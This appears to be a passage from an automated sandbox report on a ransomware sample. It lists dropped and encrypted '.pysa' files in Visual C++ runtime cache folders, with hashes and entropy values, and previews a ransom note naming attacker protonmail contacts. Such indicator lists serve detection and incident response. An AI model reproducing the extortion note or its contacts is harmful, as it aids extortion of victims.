                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1333248
                  Entropy (8bit):7.999828019680233
                  Encrypted:true
                  SSDEEP:24576:cg48OUh0chq5AuFICAp4x1O+NnBRbEd/pjIFG1VJHekVV:cg48z0H5AwaxoBJEd/+zkv
                  MD5:2CDA2FEE22D461BA5BF8BFA602ECBA6B
                  SHA1:82594516F78448505A042E6C93BDAD8E68F357F3
                  SHA-256:385F60C8678044C320F5BDB31FB50221E409D682AD943FDACFB07089C0C3F3F6
                  SHA-512:42ADA21C0A3F61DC746DDC16E2DBF459217FCF0091917E08612DB2063BA800A762372DF67B0F53178E3FF00D56791EA2005977FC13CF0D80C9F01D28AD68C8D0
                  Malicious:true
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994095639146868
                  Encrypted:true
                  SSDEEP:3072:mkuT3ok10i8irWGgE8l/XmDPDSZBPL8acI:mT0IrWGgEw/S1I
                  MD5:7F75FB699CBD712DDEA181BB39BE3199
                  SHA1:A85EAFDE28F56D92D5978A2FD31472B0A09BA511
                  SHA-256:9E33C359421B51AB2D7432883DCDA87F3A2F3ABAAD658D52CCED9E51518DAD75
                  SHA-512:319A35E2E09A5C7FC4B578912A5678AD65F8DC6E9659237F7D33A02F8992445A926DE0C22B714BB781B1B229758E07F82940FC12C2993EE4E9752D28C1D744AF
                  Malicious:true
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5122048
                  Entropy (8bit):7.999963554133727
                  Encrypted:true
                  SSDEEP:98304:J/hitU3aIHfgMc3xfxiI26V7x+pU3p+NKiByvpZhBrFvX5LA6Q3IO:hj3rtcBZiIpV7x+O+xIZhFVJUh
                  MD5:E19B8C53ACF83A5557576DC28CB56C4C
                  SHA1:EE32996AF0B38D9ADAEC0B7A3013200F79E66BA9
                  SHA-256:5C81156EA2FBB82764783C0785D2CDCB226152BBC50BB280E75830FDB9F25A09
                  SHA-512:2922FF03E205F2C2357AE17EF7D25D797C2BF33757C4DC5C2D80D0BD6C48319E5CF3C4067ADFFF9E996CF61CFF29AEFF09944F8C4C3D75D5B325486188D78E61
                  Malicious:true
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.995357959602917
                  Encrypted:true
                  SSDEEP:3072:5IHN24Xc4i/+vhO76ZtfgnVLhSk/8dPgwxTzUk2QwWI:5o15iWJO8aVck/8dPTxf3tI
                  MD5:26669A6FCBC741DDCF6C5C190913BC18
                  SHA1:6D7F45D43FEC35AA80C38FD580C0CDB4AFCFDC6B
                  SHA-256:D4A04B1B4B081DEFCFDE00AF270A894A3C852143B7A872A67FCF85F403B4F2E6
                  SHA-512:043C16C39FDA5DA4386A4BE63AF36F32F586AA3CFF336E53FBE31B8091F7A0D3A0DBFDB607179BF1D27B22F448A9436A444370FE4D244DCAB12CABB30E7B5D01
                  Malicious:true
                  C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5736448
                  Entropy (8bit):7.999960385317492
                  Encrypted:true
                  SSDEEP:98304:HhJj3v8Qqf2quthZBHeWY4FqhFWhLZc7vJkPDG5cMNRMxUZRq9vUZ0UgXRn/S4O+:BJjqOqutjReWYmmQtW7vJXnNRSUa9JUE
                  MD5:0B3853BCEF45941AC941346C8166E1F8
                  SHA1:31DA83444AC1B0DCA55C4E091CE3DB860E8A43E4
                  SHA-256:CD4E9AC11DD78C0A8D3B6B98B1DD998340E3B77B073D15E25C3A2B24BB444F29
                  SHA-512:E4AA181A2EB8AC4EDD2E6B10F5EB701DAC0E0AFAB3A0CE1618EA9558F40AA8A9DC9E09370F45EA4A4E2780BFBF36235F30B278A50EE6B572ABC6CF14E9EFE81F
                  Malicious:true
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994070542571197
                  Encrypted:true
                  SSDEEP:3072:E9wY7BzBnFklJ+wRnY5BTIACKVSDWVjqFRVCK:E9BVz9FvwRnOpVSDWV+FRN
                  MD5:983156B6AD6A3FEECEBFEF5511ADCD88
                  SHA1:C752F347C262F67F899AB4EBF77061C540870989
                  SHA-256:0DDB64F34F24C8FC8D57BF255B5F47F79731D36EAAAE1BCDED66A615493D69DD
                  SHA-512:9940F2FD5D78390F4A0171D10D16C829E44F7A6B574428731E1841316D9B75E7D7EB772196E4C53AF7F6E67D439037576423106CD77ECF2AAEBCC89BA4E7924F
                  Malicious:true
                  C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\state.rsm.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.06135982677317
                  Encrypted:false
                  SSDEEP:48:4OAeUqhy8fHJgZG9W4Y2vzgsgpMA/NuO6MgGU165V+93:Oe7UUq2vzcpVV1UQfa
                  MD5:469ACBED91EF53CCD0C52A36C213CF85
                  SHA1:1E0A5D1547680DDDC902AF92E2AB83C37E03C681
                  SHA-256:F17E711BE4EF04EE57C026002813DEC831112B2AE25192ABC06F16DCB1FB4FF8
                  SHA-512:E7414571942569C2D35846286D7177C43BDFE083C59BBDF9B63D4E9B6608419FD37CD253668261A06E5C6DD7105FD24EDBBDE48FC9A2E232E8F9E7F4B00FBCF0
                  Malicious:false
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5531648
                  Entropy (8bit):7.999964479312233
                  Encrypted:true
                  SSDEEP:98304:GtsXOKcG+Ugqu0FUwt0RNhKJpUpfJUVwW55Htk2JccHJG2/ABP8AZAKa:oeJz4h0/uRNmCzUVRPHK2JRt4BPtZAKa
                  MD5:F646D591656104B2F89AD37B81DE29AE
                  SHA1:0FC7CFA3B23E8C554BAF858B1362BA37936359C0
                  SHA-256:01FF193ACF3C84E9AC549B1AE06CD30682DCA1F5FA389CE7AECDB4EB93DDE067
                  SHA-512:6B5CEE5531CB8CE90C6DE056C023A6D82773A47D6F4986E3496C6D7A24A97D0213268D9771AEA489DAB4882A10715C230938641EAB09A2E3F5830D232D32667D
                  Malicious:true
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994130765911331
                  Encrypted:true
                  SSDEEP:3072:gWQNGw39hTeeTt6tvAf2BuApQZ56FQaqHd9F:Vq3XC1R8H56bqHfF
                  MD5:65D3E7FA3896796E1E1627EA63D1A6BA
                  SHA1:907B4E068B4B65861846AE8269460A8960CDCA3F
                  SHA-256:9A168E06890FEC9524CE3D10620BCA46BD0C3B2AC79F08566F540780805A57B3
                  SHA-512:073D59919C6359D0A8D344AA279603244A34642FBB6C43D26EF2FBA0823A426920B48068954ED772EB334512BB1188B1EABF01FA31ABF3BE1D9C02BC2B4FEB97
                  Malicious:true
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1026048
                  Entropy (8bit):7.999814604038516
                  Encrypted:true
                  SSDEEP:24576:P2AWEl77M0k0BTGsnyFlDyrU2qmbclHIXDdqJq0wZ949:ubk7w0BTGBQUXucmTE4e
                  MD5:BFD1381FB22DB2965ECC1D3DA8467F81
                  SHA1:C1679BF1BA820342DC14E050644A6295830B647D
                  SHA-256:D5051DD198CA0FA18AFB6A6127BF6C2DA4BAF4347329FEE72C925EFCCD037DC3
                  SHA-512:696625A5056965C408CAD7532AF009EC4151052DDD5D65581F765EDBEFCE1B83F241F568BEDB6ACE70CC53D30B49F3C3653E975E81F383A96B46F28562D9BC26
                  Malicious:true
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994444057630691
                  Encrypted:true
                  SSDEEP:3072:VQvRzLHNPHaft4WqwY5A8wVS+cDmlZennzRUyPOb/klPUB:VQBHhafpqeZkmGnzRU0ObyUB
                  MD5:E2F5EE60ECF9D9E0D2F5F4D7DC0AEBE7
                  SHA1:C7BB98ECF8D3879C53146F6CB088F31F1103EAEC
                  SHA-256:BBAB30972498BE0D188E29433658437922736C022F5D5332429B81F681F58BD1
                  SHA-512:CC8BB7C3D7FFA6414CFA2E38BA3B3975D33410D08BE3730F0722698D8E675CF609E7B2F95166A25A0D0DF4358C0C45E28AE93D5AE3C84351645D1E8B52D5F3A4
                  Malicious:true
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5122048
                  Entropy (8bit):7.999960924661378
                  Encrypted:true
                  SSDEEP:98304:avTHGNHBEClrfXF/1iMqv31jWzbpkjHj5ZgMvdttBehDFfmxWQ0xfoSrj1:9P/sNv1Czlwlv5c5m/0xfow5
                  MD5:48C97444D5B5B573C2E88825C5ECC67C
                  SHA1:FD9DA9D6A896680EF904319411B73F7B6EDE4531
                  SHA-256:4F495AF2304527402B7D9B1D27CBB31D5CD75E4D3A29B863FBB011775B2A4E62
                  SHA-512:12C31779DBF5444DA571576F8785E50D5CF63ADB1122DAB55B90EE06866DBBE723A282C100BFB130D6DD7B30DB04A5C2458554005DFD5D7CC39F434F6DD1C6F0
                  Malicious:true
